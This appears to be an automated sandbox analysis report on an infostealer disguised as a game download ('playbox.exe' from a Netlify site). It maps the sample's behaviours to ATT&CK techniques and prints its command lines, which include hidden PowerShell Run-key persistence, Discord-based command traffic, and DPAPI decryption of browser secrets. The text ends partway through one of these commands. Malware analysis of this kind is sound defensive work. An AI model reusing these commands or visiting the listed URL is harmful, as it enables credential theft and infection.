hxxp://playboxgamemix[.]netlify[.]app

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	playbox.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	cscript.exe

Executes dropped EXE 1 IoCs

pid	Process
2716	playbox.exe

Loads dropped DLL 1 IoCs

pid	Process
2716	playbox.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\xGdKlfJTqLoOnEp.ps1\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\Downloads\\PlayboxSetup\\playbox.exe"	reg.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
2796	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
65	discord.com
69	discord.com
97	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
66	api.ipify.org

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
3896	cmd.exe
5060	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe

Detects videocard installed 1 TTPs 11 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

pid	Process
4764	WMIC.exe
4608	WMIC.exe
5060	WMIC.exe
2708	WMIC.exe
1972	WMIC.exe
1156	WMIC.exe
2292	WMIC.exe
3292	WMIC.exe
3804	WMIC.exe
3044	WMIC.exe
1624	WMIC.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
3492	tasklist.exe
3996	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
3136	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133643198079312397"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings	chrome.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
4208	reg.exe
1332	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1800	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4988	chrome.exe
4988	chrome.exe
4268	powershell.exe
4268	powershell.exe
4268	powershell.exe
5012	powershell.exe
5012	powershell.exe
5012	powershell.exe
4732	powershell.exe
4732	powershell.exe
4732	powershell.exe
4236	powershell.exe
4236	powershell.exe
4236	powershell.exe
4072	powershell.exe
4072	powershell.exe
4072	powershell.exe
3876	powershell.exe
3876	powershell.exe
3876	powershell.exe
2604	powershell.exe
2604	powershell.exe
2604	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
4920	powershell.exe
4920	powershell.exe
4920	powershell.exe
3136	powershell.exe
3136	powershell.exe
3136	powershell.exe
2000	powershell.exe
2000	powershell.exe
2000	powershell.exe
3388	powershell.exe
3388	powershell.exe
3388	powershell.exe
2716	playbox.exe
2716	playbox.exe
2716	playbox.exe
2152	powershell.exe
2152	powershell.exe
2152	powershell.exe
2180	powershell.exe
2180	powershell.exe
2180	powershell.exe
1556	powershell.exe
1556	powershell.exe
1556	powershell.exe
892	taskmgr.exe
892	taskmgr.exe
2604	powershell.exe
2604	powershell.exe
2604	powershell.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
2028	powershell.exe
2028	powershell.exe
2028	powershell.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
892	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe
Token: SeShutdownPrivilege	4988	chrome.exe
Token: SeCreatePagefilePrivilege	4988	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
5040	7zG.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
4988	chrome.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe
892	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4988 wrote to memory of 2264	4988	chrome.exe	82
PID 4988 wrote to memory of 2264	4988	chrome.exe	82
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 3064	4988	chrome.exe	83
PID 4988 wrote to memory of 4448	4988	chrome.exe	84
PID 4988 wrote to memory of 4448	4988	chrome.exe	84
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85
PID 4988 wrote to memory of 2840	4988	chrome.exe	85

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://playboxgamemix.netlify.app
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9747eab58,0x7ff9747eab68,0x7ff9747eab78
  2⤵
  PID:2264
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=280 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:2
  2⤵
  PID:3064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:8
  2⤵
  PID:4448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2212 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:8
  2⤵
  PID:2840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2776 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:1
  2⤵
  PID:1864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2800 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:1
  2⤵
  PID:3432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3900 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:1
  2⤵
  PID:2436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4944 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:8
  2⤵
  PID:1792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4440 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:8
  2⤵
  PID:432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4972 --field-trial-handle=1896,i,11069974228332786304,13169078296566857472,131072 /prefetch:8
  2⤵
  PID:3492

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:904

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3388

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\PlayboxSetup\" -spe -an -ai#7zMap31564:86:7zEvent17851
1⤵
- Suspicious use of FindShellTrayWindow
PID:5040

C:\Users\Admin\Downloads\PlayboxSetup\playbox.exe
"C:\Users\Admin\Downloads\PlayboxSetup\playbox.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
  2⤵
  PID:2988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
    3⤵
    PID:4428
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -noprofile -
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4268
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oulxpk2c\oulxpk2c.cmdline"
      4⤵
      PID:668
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE937.tmp" "c:\Users\Admin\AppData\Local\Temp\oulxpk2c\CSC6CF1C74C3D3C4D7BB74171C975C58C6D.TMP"
        5⤵
        
        PID:4592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:2368
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:3908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4344
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:3492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
  2⤵
  PID:1068
- - C:\Windows\system32\taskkill.exe
    taskkill /IM chrome.exe /F
    3⤵
    - Kills process with taskkill
    PID:3136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4528
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:3996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,6,99,59,19,92,149,197,65,145,228,210,141,215,140,131,116,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,155,35,83,190,139,240,78,64,183,181,176,71,154,136,46,8,154,175,198,238,66,163,199,19,96,154,189,19,157,7,98,100,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,121,32,168,152,124,29,126,161,46,102,36,210,172,232,79,133,7,149,72,161,111,219,248,207,78,78,45,212,7,0,196,95,48,0,0,0,254,221,17,226,162,246,210,144,181,174,8,17,112,91,2,188,27,116,7,240,53,165,197,248,206,109,93,19,115,128,29,174,255,134,212,76,70,27,93,216,139,50,1,209,204,193,59,55,64,0,0,0,207,184,225,20,186,104,44,46,202,44,51,151,158,1,215,252,254,82,197,210,118,130,96,79,86,107,109,226,74,57,130,147,113,159,137,248,111,189,48,247,47,64,190,226,117,187,13,62,42,36,201,25,51,96,88,26,62,114,5,242,86,224,211,96), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  PID:3896
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,6,99,59,19,92,149,197,65,145,228,210,141,215,140,131,116,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,155,35,83,190,139,240,78,64,183,181,176,71,154,136,46,8,154,175,198,238,66,163,199,19,96,154,189,19,157,7,98,100,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,121,32,168,152,124,29,126,161,46,102,36,210,172,232,79,133,7,149,72,161,111,219,248,207,78,78,45,212,7,0,196,95,48,0,0,0,254,221,17,226,162,246,210,144,181,174,8,17,112,91,2,188,27,116,7,240,53,165,197,248,206,109,93,19,115,128,29,174,255,134,212,76,70,27,93,216,139,50,1,209,204,193,59,55,64,0,0,0,207,184,225,20,186,104,44,46,202,44,51,151,158,1,215,252,254,82,197,210,118,130,96,79,86,107,109,226,74,57,130,147,113,159,137,248,111,189,48,247,47,64,190,226,117,187,13,62,42,36,201,25,51,96,88,26,62,114,5,242,86,224,211,96), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,6,99,59,19,92,149,197,65,145,228,210,141,215,140,131,116,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,165,162,117,116,222,101,115,200,198,214,189,245,245,145,112,137,100,37,252,99,133,68,167,154,134,73,170,205,22,190,20,2,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,234,179,229,152,186,119,58,6,125,108,83,47,218,192,240,123,221,34,151,0,206,114,233,204,166,38,170,69,208,29,245,222,48,0,0,0,65,234,21,156,203,156,10,193,40,122,154,0,187,175,47,36,219,240,254,153,152,79,157,119,242,202,73,181,189,206,175,113,209,54,169,250,74,132,71,138,234,154,73,207,130,9,239,28,64,0,0,0,184,172,213,9,161,199,246,52,21,22,63,113,174,73,169,114,80,71,218,105,64,88,130,68,70,73,183,78,202,229,196,7,113,251,79,57,191,121,31,85,229,109,39,22,249,15,16,107,166,186,144,81,225,232,117,12,181,132,89,212,154,104,235,116), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  PID:5060
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,6,99,59,19,92,149,197,65,145,228,210,141,215,140,131,116,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,165,162,117,116,222,101,115,200,198,214,189,245,245,145,112,137,100,37,252,99,133,68,167,154,134,73,170,205,22,190,20,2,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,234,179,229,152,186,119,58,6,125,108,83,47,218,192,240,123,221,34,151,0,206,114,233,204,166,38,170,69,208,29,245,222,48,0,0,0,65,234,21,156,203,156,10,193,40,122,154,0,187,175,47,36,219,240,254,153,152,79,157,119,242,202,73,181,189,206,175,113,209,54,169,250,74,132,71,138,234,154,73,207,130,9,239,28,64,0,0,0,184,172,213,9,161,199,246,52,21,22,63,113,174,73,169,114,80,71,218,105,64,88,130,68,70,73,183,78,202,229,196,7,113,251,79,57,191,121,31,85,229,109,39,22,249,15,16,107,166,186,144,81,225,232,117,